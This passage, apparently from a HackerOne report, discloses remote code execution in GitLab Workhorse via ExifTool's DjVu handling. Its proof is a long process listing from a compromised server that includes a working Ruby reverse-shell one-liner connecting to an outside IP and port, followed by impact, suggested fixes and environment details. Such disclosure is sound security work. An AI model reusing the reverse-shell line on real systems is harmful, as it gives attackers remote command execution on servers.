1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T20:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T20:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T20:29:46", "rev": 2}}, "objectVersion": 